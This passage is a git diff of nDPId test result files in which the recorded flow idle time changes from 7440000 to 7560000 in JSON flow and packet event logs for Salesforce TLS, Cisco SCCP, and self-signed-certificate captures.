{"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637949675032,"flow_last_seen":1637949675032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637949675032,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":4195,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1637949675181} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 diff --git a/test/results/sccp_hw_conf_register.pcapng.out b/test/results/sccp_hw_conf_register.pcapng.out index 662d19102..e9014a4e6 100644 --- a/test/results/sccp_hw_conf_register.pcapng.out +++ b/test/results/sccp_hw_conf_register.pcapng.out @@ -1,11 +1,11 @@ 00474{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1557178511664} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1557178511664,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1557178511664,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAsOMQAAP8GkNUKtG46CrRuMLV9B9BgU38BAAAAAGACECD5kQAAAgQFtA=="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"uDhhiHXEAFBW6tqSCABFAAAsAABAAEAGSPoKtG4wCrRuOgfQtX0KPck5YFN\/AmASchDEGQAAAgQFtA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAoOMUAAP8GkNgKtG46CrRuMLV9B9BgU38CCj3JOlAQECA9xwAA"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1557178511664,"flow_last_seen":1557178511707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1557178511707,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1557178511664,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1557178511664,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAsOMQAAP8GkNUKtG46CrRuMLV9B9BgU38BAAAAAGACECD5kQAAAgQFtA=="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"uDhhiHXEAFBW6tqSCABFAAAsAABAAEAGSPoKtG4wCrRuOgfQtX0KPck5YFN\/AmASchDEGQAAAgQFtA=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAoOMUAAP8GkNgKtG46CrRuMLV9B9BgU38CCj3JOlAQECA9xwAA"} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1557178511664,"flow_last_seen":1557178511707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1557178511707,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-data-len":596,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1557178511908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 diff --git a/test/results/selfsigned.pcap.out b/test/results/selfsigned.pcap.out index d73071f79..667607715 100644 --- a/test/results/selfsigned.pcap.out +++ b/test/results/selfsigned.pcap.out @@ -1,12 +1,12 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"selfsigned.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1588921646472} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588921646472,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1588921646472,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} -01039{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588921646472,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1588921646472,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 